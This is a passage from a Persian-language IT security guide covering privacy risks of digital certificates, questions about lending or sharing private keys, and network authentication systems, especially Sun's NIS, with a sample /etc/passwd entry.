‫ﺳﻦ‪ ،‬ﺟﻨﺲ‪ ،‬ﻳﺎ ﻋﻜﺲ ﺍﻓﺮﺍﺩ ﺑﻮﺩﻧﺪ‪ ،‬ﻛﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﮔﻔﺘﻨﺪ ﻛﻪ ﺍﮔﺮ ﺍﻳﻦ ﺷﻨﺎﺳﻪﻫﺎ ﺑﺪﻭﻥ ﺭﺿﺎﻳﺖ ﻛﺎﺭﺑﺮ ﺍﻓﺸﺎ ﺷﻮﻧﺪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺁﻧﻬﺎ‬
‫ﻣﻮﺭﺩ ﺗﺠﺎﻭﺯ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ﻭ ﺍﻟﺒﺘﻪ ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺣﻖ ﺑﺎ ﺁﻧﻬﺎ ﺑﺎﺷﺪ‪ .‬ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺻﻠﻲﺗﺮﻳﻦ ﻧﻘﻄﺔ ﻗﻮﺕ ﻛﺎﺭﺕ ﺷﻨﺎﺳﺎﻳﻲ ﺍﺳﺖ‪:‬‬
‫ﺣﺬﻑ ﮔﻤﻨﺎﻣﻲ ﻭ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺣﻔﻆ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‪ ،‬ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻥ ﻫﻮﻳﺖ ﻭ ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ‪.‬‬
‫‪٣٢٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ‪ ،‬ﺗﺠﻤﻴﻊ ﺩﺍﺩﻩ ﺭﺍ ﺳﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‬
‫ﻃﻲ ﺩﻭ ﺩﻫﺔ ﮔﺬﺷﺘﻪ‪ ،‬ﺷﻨﺎﺳﺎﻧﻨﺪﻩﻫﺎﻱ ﺟﻬﺎﻧﻲ ‪ -‬ﻣﺜﻞ ﺷﻤﺎﺭﺓ ﺍﻣﻨﻴﺖ ﺍﺟﺘﻤﺎﻋﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ‪ -‬ﺗﺒﺪﻳﻞ ﺑﻪ ﺍﺑﺰﺍﺭﻱ ﺑـﺮﺍﻱ ﻧﻘـﺾ ﻧﻈـﺎﻡﻣﻨـﺪ‬
‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﻓﺮﺍﺩ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺷﻨﺎﺳﺎﻧﻨﺪﻩﻫﺎﻱ ﺟﻬﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺗﺠﻤﻴﻊ ﺍﻃﻼﻋﺎﺕ ﻣﻨﺎﺑﻊ ﻣﺘﻔﺎﻭﺕ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ﻭ ﭘﺮﻭﻧﺪﻩﻫﺎﻱ ﻓﺮﺍﮔﻴـﺮﻱ‬
‫ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺑﻮﺟﻮﺩ ﺁﻭﺭﻧﺪ‪ .‬ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺻﺎﺩﺭﺷﺪﻩ ﺍﺯ ﻳﻚ ﻣﻨﻄﻘﺔ ﻣﺮﻛﺰﻱ ﺑﺼﻮﺭﺕ ﺑﺎﻟﻘﻮﻩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺑﺰﺍﺭﻱ ﺑﺴﻴﺎﺭ ﺑﻬﺘـﺮ ﺍﺯ ﺷـﻤﺎﺭﺓ‬
‫ﺍﻣﻨﻴﺖ ﺍﺟﺘﻤﺎﻋﻲ ﺑﺮﺍﻱ ﺗﺠﻤﻴﻊ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺷﻨﺪ‪ ،‬ﭼﻮﻥ ﺑﺰﺭﮔﺘﺮﻳﻦ ﺿﻌﻒ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﺟﺘﻤﺎﻋﻲ ‪ -‬ﺍﻃﻼﻋﺎﺕ ﻧﺎﺩﺭﺳﺖ ‪ -‬ﺭﺍ ﺭﻓﻊ ﻣـﻲ‪-‬‬
‫ﻛﻨﻨﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻓﺮﺍﺩ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﺟﺘﻤﺎﻋﻲ ﺧﻮﺩ ﺭﺍ ﺗﻌﻤﺪﹰﺍ ﻧﺎﺩﺭﺳﺖ ﻣﻲﮔﻮﻳﻨﺪ ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻴﺰ ﺁﻧﻬﺎ ﺭﺍ ﺍﺷﺘﺒﺎﻩ ﺗﺎﻳﭗ ﻣـﻲﻛﻨﻨـﺪ؛‬
‫ﺍﻣﺎ ﺑﺎ ﻭﺟﻮﺩ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﭼﻨﻴﻦ ﺍﺧﺘﻴﺎﺭﻱ ﺍﺯ ﺍﻓﺮﺍﺩ ﺳﻠﺐ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻻ ﺍﻳﻦ ﺭﻭﻧﺪ ﺑـﺪﻟﻴﻞ ﻋـﺪﻡ ﺗﻄﺒﻴـﻖ ﺷـﻤﺎﺭﻩﻫـﺎ ﺑـﻪ‬
‫ﺍﻣﺮﻭﺯ ﻭﻗﺘﻲ ﺩﻭ ﺷﺮﻛﺖ ﺳﻌﻲ ﻣﻲﻛﻨﻨﺪ ﺍﻃﻼﻋﺎﺕ ﺷﻨﺎﺳﺎﻳﻲ ﻓﺮﺩﻱ ﺭﺍ ﺗﻄﺒﻴﻖ ﺩﻫﻨﺪ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺸﻜﻞ ﺑﺮﺧﻮﺭﺩ ﻣﻲﻛﻨﺪ‪ .‬ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺪﻟﻴﻞ ﻧﻮﻉ ﻃﺮﺍﺣﻲ ﺧﻮﺩ ﺍﻳﻦ ﺭﻭﻧﺪ ﺭﺍ ﺳﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭﻧﺘﻴﺠـﻪ ﺍﺣﺘﻤـﺎﻝ ﺳـﺎﺧﺘﻦ ﺑﺎﻧﻜﻬـﺎﻱ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﺑﺰﺭﮒ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺩﻱ ﺗﺠﻤﻴﻊ ﺷﺪﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﺘﻌﺪﺩ ﺍﻓﺰﺍﻳﺶ ﻣﻲﻳﺎﺑﺪ‪.‬‬
‫ﭼﮕﻮﻧﻪ ﻳﻚ ﻛﻠﻴﺪ ﺭﺍ ﻗﺮﺽ ﻣﻲﺩﻫﻴﺪ‬
‫ﻓﺮﺽ ﻛﻨﻴﺪ ﺷﻤﺎ ﺩﺭ ﺑﻴﻤﺎﺭﺳﺘﺎﻥ ﻣﺮﻳﺾ ﻫﺴﺘﻴﺪ ﻭ ﺍﺯ ﺩﻭﺳﺘﺘﺎﻥ "ﻛﺎﺭﻝ" ﻣﻲﺧﻮﺍﻫﻴﺪ ﺑﻪ ﺩﻓﺘﺮﺗﺎﻥ ﺑﺮﻭﺩ ﻭ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻤﺎ ﺭﺍ ﺑﻴـﺎﻭﺭﺩ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺎﻳﺪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺍﻭ ﺑﺪﻫﻴﺪ‪ .‬ﺁﻳﺎ ﺷﻤﺎ ﺑﺎﻳﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ؟ ﺁﻳﺎ ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﻛﺎﺭ ﺍﻧﺠﺎﻡ ﺷﺪ‪ ،‬ﺷﻤﺎ ﺑﺎﻳـﺪ‬
‫ﻛﻠﻴﺪ ﺧﻮﺩ ﺭﺍ ﺑﺎﻃﻞ ﻛﻨﻴﺪ؟ ﻓﺮﺽ ﻛﻨﻴﺪ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎ ﻗﺴﻤﺘﻲ ﺍﺯ ﻳﻚ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﻣـﺸﻜﻞ ﺩﺍﺭﺩ‪ .‬ﻭﻗﺘـﻲ ﺍﺯ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ ‪ A‬ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﺪ ﺑﺎ ﻣﺸﻜﻞ ﻣﻮﺍﺟﻪ ﻣﻲﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﻭﻗﺘﻲ ﺍﺯ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ‪ B‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ ﺑﺎ ﻣﺸﻜﻠﻲ ﻣﻮﺍﺟﻪ ﻧﻤﻲﺷﻮﺩ‪ .‬ﺁﻳﺎ ﺍﺯ ﻟﺤﺎﻅ ﻗﺎﻧﻮﻧﻲ ﺍﻭ ﺑﺎﻳﺪ‬
‫ﺍﺟﺎﺯﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ‪ A‬ﺭﺍ ﺑﻪ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺪﻫﺪ ﺗﺎ ﺁﻧﻬﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻔﻬﻤﻨﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﭼﻪ ﺍﺷﻜﺎﻟﻲ‬
‫ﺩﺍﺭﺩ؟ ﻳﺎ ﺍﻭ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺟﺎﻣﻌﻴﺖ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﺍ ﺑﻪ ﻣﺨﺎﻃﺮﻩ ﻧﻤﻲﺍﻧﺪﺍﺯﺩ؟‬
‫ﺣﺎﻝ ﻓﺮﺽ ﻛﻨﻴﺪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﺘﻌﻠﻖ ﺑﻪ ﻓﺮﺩ ﺧﺎﺻﻲ ﻧﻴﺴﺖ‪ ،‬ﻭ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﻘﺸﻲ ﺍﺳﺖ ﻛﻪ ﻭﻱ ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ﺑﺮ ﻋﻬـﺪﻩ ﺩﺍﺭﺩ‪ .‬ﺑﻌﻨـﻮﺍﻥ‬
‫ﻣﺜﺎﻝ ﻳﻚ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻣﻀﺎﻱ ﺳﻔﺎﺭﺷﺎﺕ ﺧﺮﻳﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺁﻳﺎ ﺩﺭﺳـﺖ ﺍﺳـﺖ ﻛـﻪ ﺩﻭ ﻧﻔـﺮ ﺁﻥ‬
‫ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ؟ ﻳﺎ ﺁﻥ ﺷﺮﻛﺖ ﺑﺎﻳﺪ ﺩﻭ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ‪ -‬ﻳﻚ ﻛﻠﻴﺪ ﺑﺮﺍﻱ ﻫﺮﻳﻚ ﺍﺯ ﻛﺴﺎﻧﻲ ﻛﻪ ﺑﺎﻳﺪ ﺳﻔﺎﺭﺷـﺎﺕ ﺧﺮﻳـﺪ ﺭﺍ‬
‫ﺍﻣﻀﺎ ﻛﻨﻨﺪ ‪ -‬ﺑﺴﺎﺯﺩ؟‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ ﺷﺒﻜﻪ‬
‫ﺑﺮﺍﻱ ﺣﻞ ﻣﺸﻜﻞ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﭼﻨﺪ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻣﺘﺼﻞ ﺑﻪ ﻫﻢ ﺍﺯ ﻃﺮﻳﻖ ﻳـﻚ ﺷـﺒﻜﺔ ﻧـﺎﻣﻄﻤﺌﻦ ﻭ‬
‫ﻻ ﻧﺎﺍﻣﻦ ﺩﺭ ﺩﺳﺘﺮﺱ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺭﺍﻩﺣﻠﻬﺎﻱ ﺯﻳﺎﺩﻱ ﭘﻴﺸﻨﻬﺎﺩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﺳﺎﺩﮔﻲ ﺗﺮﺟﻴﺢ ﻣـﻲﺩﻫـﻴﻢ ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺏ‬
‫ﺍﺣﺘﻤﺎ ﹰ‬
‫ﻛﺎﺭﺑﺮﻱ ﻛﺎﺭﺑﺮ ﺩﺭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻣﺮﻛﺰﻱ ﺫﺧﻴﺮﻩ ﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺸﺘﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﻢ ﺍﻃﻼﻋﺎﺕ ﺁﻥ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫ﻣﺮﻛﺰﻱ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺩﻳﮕﺮ ﺑﺼﻮﺭﺕ ﺑﻼﺩﺭﻧﮓ ﺫﺧﻴﺮﻩ ﺷﻮﺩ‪ .‬ﺑﺪﻟﻴﻞ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻻﺯﻡ ﺍﺳﺖ ﻣﻄﻤﺌﻦ ﺷﻮﻳﻢ ﺯﻣﺎﻧﻴﻜـﻪ ﻛـﺎﺭﺑﺮ‬
‫ﻭﺍﺭﺩ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻣﻲﺷﻮﺩ‪ ،‬ﻫﻮﻳﺘﺶ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻣﺮﻛـﺰﻱ ﻭ ﺑـﺪﻭﻥ ﺍﻓـﺸﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﻪ ﺭﻭﻱ‬
‫ﺷﺒﻜﺔ ﻧﺎﻣﻄﻤﺌﻦ ﺗﺼﺪﻳﻖ ﻣﻲﺷﻮﺩ‪ .‬ﺍﮔﺮﭼﻪ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺭﺍﻩﺣﻠﻬﺎﻳﻲ ‪ -‬ﻣﺜﻞ ‪ ،Kerberos ،NIS+ ،NIS‬ﻭ ‪ - LDAP‬ﺍﺭﺍﺋﻪ ﺷﺪﻩ‪ ،‬ﺍﻣـﺎ‬
‫ﻫﻴﭽﻴﻚ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻭ ﺑﺼﻮﺭﺕ ﻗﻄﻌﻲ ﭘﺬﻳﺮﻓﺘﻪ ﻧﺸﺪﻩﺍﻧﺪ‪ NIS .‬ﻭ ‪ NIS+‬ﺍﺑﺘﺪﺍ ﺩﺭ ﻣﺤﻴﻄﻬـﺎﻳﻲ ﺑـﺎ ﭼﻨـﺪﻳﻦ ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ‪Unix‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪﻧﺪ؛ ﻭ ‪ Kerberos‬ﻭ ‪ LDAP‬ﻧﻴﺰ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻣﺤﻴﻄﻬﺎ ﻗﺴﻤﺖ ﻣﻬﻤﻲ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑـﺮ ‪Windows NT‬‬
‫ﺭﺍ ﺗﺸﮑﻴﻞ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫‪٣٢٩‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﺧﺪﻣﺎﺕ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﻪﺍﻱ ‪SUN‬‬
‫‪١٥٣‬‬
‫ﻳﻜﻲ ﺍﺯ ﻗﺪﻳﻤﻲﺗﺮﻳﻦ ﻭ ﻣﺸﻬﻮﺭﺗﺮﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻫﺒﺮﻱ ﺗﻮﺯﻳﻊﺷﺪﺓ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ‪ ،‬ﺧـﺪﻣﺎﺕ ﺍﻃﻼﻋـﺎﺕ ﺷـﺒﻜﻪﺍﻱ )‪(NIS‬‬
‫ﺍﺳﺖ‪ .‬ﭼﻨﺪ ﺳﺎﻝ ﺑﻌﺪ ‪ NIS+‬ﻋﺮﺿﻪ ﺷﺪ‪ ،‬ﻛﻪ ﻧﻮﻉ ﺑﻬﺒﻮﺩ ﻳﺎﻓﺘﻪ ﻭ ﺍﻟﺒﺘﻪ ﭘﻴﭽﻴﺪﻩﺗﺮ ‪ NIS‬ﺍﺳﺖ‪ .‬ﻛﻤﻲ ﺍﺧﻴﺮﺗﺮ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ‪LDAP‬‬
‫)ﭘﺮﻭﺗﻜﻞ ﺳﺒﻚﻭﺯﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ(‪ ١٥٤‬ﻣﺤﺒﻮﺑﻴﺖ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻛﺮﺩ‪ ،‬ﻭ ﻫﻢﺍﻛﻨﻮﻥ ﻛﺎﺭﺑﺮﺍﻥ ‪ Sun‬ﺑﻪ ﺧﺪﻣﺎﺕ ﻣﺒﺘﻨـﻲ ﺑـﺮ ‪ LDAP‬ﺭﻭﻱ‬
‫ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺑﺎ ﺍﻳﻨﻜﻪ ‪ Sun‬ﺑﺪﻻﻳﻞ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﺧﻮﺍﺳﺖ ﮐﻪ ﺍﺯ ‪ NIS‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻨـﺪ‪ ،‬ﺍﻣـﺎ ﻫﻨـﻮﺯ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺤﻴﻄﻬـﺎ ﺍﺯ ﺁﻥ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺷـﺮﻛﺖ ‪Sun‬‬
‫‪ NIS‬ﻳﻚ ﺳﻴﺴﺘﻢ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﺍﻱ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺍﺳﺖ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﭼﻨﺪﻳﻦ ﺭﺍﻳﺎﻧﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻣﺰ ﻋﺒﻮﺭ‪ ،‬ﻓﺎﻳﻠﻬﺎﻱ ﮔﺮﻭﻩ‪ ،‬ﺟـﺪﺍﻭﻝ‬
‫ﻣﻴﺰﺑﺎﻧﻬﺎ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺩﻳﮕﺮ ﺩﺭ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﻫﺮﭼﻨﺪ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻓﺎﻳﻠﻬﺎ ﺭﻭﻱ ﻫﺮﻳﻚ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﺗﻨﻬﺎ ﺩﺭ‬
‫ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ‪ NIS‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ )ﻭ ﺍﺣﺘﻤﺎ ﹰﻻ ﺭﻭﻱ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﻳﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺩﻭﻡ ﺗﻜـﺮﺍﺭ ﺷـﺪﻩ ﺍﺳـﺖ(‪.‬‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺷﺒﻜﻪ ‪ -‬ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ‪ - NIS‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩﺍﻧـﺪ )ﻣﺜـﻞ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ( ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻛﻪ ﮔﻮﻳﺎ ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﻣﺤﻠﻲ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﺍﻳـﻦ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﺩﺍﺩﻩ ﻧﮕﺎﺷـﺘﻬﺎﻱ‬
‫‪ ١٥٥NIS‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ NIS‬ﻳﻚ ﺷﺒﻜﺔ ﺑﺰﺭﮒ ﺁﺳﺎﻧﺘﺮ ﺍﺩﺍﺭﻩ ﻣﻲﺷﻮﺩ‪ ،‬ﭼﻮﻥ ﺗﻤﺎﻡ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺭﻭﻱ ﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﺫﺧﻴـﺮﻩ‬
‫ﻣﻲﺷﻮﺩ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺭﻭﻱ ﻫﻤﺔ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫ﺑﻌﻀﻲ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺩﺭ ﻧﮕﺎﺷﺘﻬﺎﻱ ‪ NIS‬ﺑﺎ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺘﻨﺎﻇﺮ ﺧﻮﺩ ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲﺷﻮﻧﺪ ﻭ ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺑﻪ ﺩﺍﺩﻩﻫﺎﻳﺸﺎﻥ ﺍﻓﺰﻭﺩﻩ ﻣﻲﮔﺮﺩﺩ‪ .‬ﺩﺭ ﻣﻮﺭﺩ‬
‫ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ‪ NIS‬ﺍﺯ ﻋﻼﻣﺖ ﺟﻤﻊ )‪ (+‬ﺑﺮﺍﻱ ﺍﻋﻼﻡ ﺗﻮﻗﻒ ﻋﻤﻠﻴﺎﺕ ﺧﻮﺍﻧﺪﻥ ﻓﺎﻳﻞ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ )ﻣﺜ ﹰﻼ ‪ (/etc/passwd‬ﻭ ﺳـﭙﺲ‬
‫ﻻ ﭼﻨﺪﻳﻦ ﻧﮕﺎﺷﺖ‬
‫ﭘﺮﺱ ﻭ ﺟﻮ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ NIS‬ﺭﺍ ﺍﺯ ﻳﻚ ﻧﮕﺎﺷﺖ ﻣﻨﺎﺳﺐ ‪) NIS‬ﻣﺜﻞ ‪ (passwd‬ﺁﻏﺎﺯ ﻣﻲﻛﻨﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻌﻤﻮ ﹰ‬
‫ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﻳﻜﻲ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺷﺎﺧﺔ ‪ /etc‬ﻣﺜﻞ ‪ ،/etc/hosts ،/etc/passwd‬ﻭ ‪ /etc/services‬ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲﻛﻨـﺪ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ‪ ،‬ﻓﺎﻳﻞ ‪ /etc/passwd‬ﺩﺭ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﻳﻦ ﺻﻮﺭﺕ ﺩﻳﺪﻩ ﺷﻮﺩ‪:‬‬
‫‪root:si4NOjF9Q8JqE:0:1:Mr. Root:/:/bin/sh‬‬
‫‪+:: 999:999:::‬‬
‫‪ NIS‬ﻫﻤﭽﻨﻴﻦ ﺷﻤﺎ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻧﺘﺨﺎﺑﻲ ﺑﻌﻀﻲ ﺩﺍﻣﻨـﻪﻫـﺎ ﺭﺍ ﺍﺯ ﺑﺮﺧـﻲ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﺩﺍﺩﺓ ‪ /etc/passwd‬ﻭﺍﺭﺩ ﻛﻨﻴـﺪ‪.‬‬
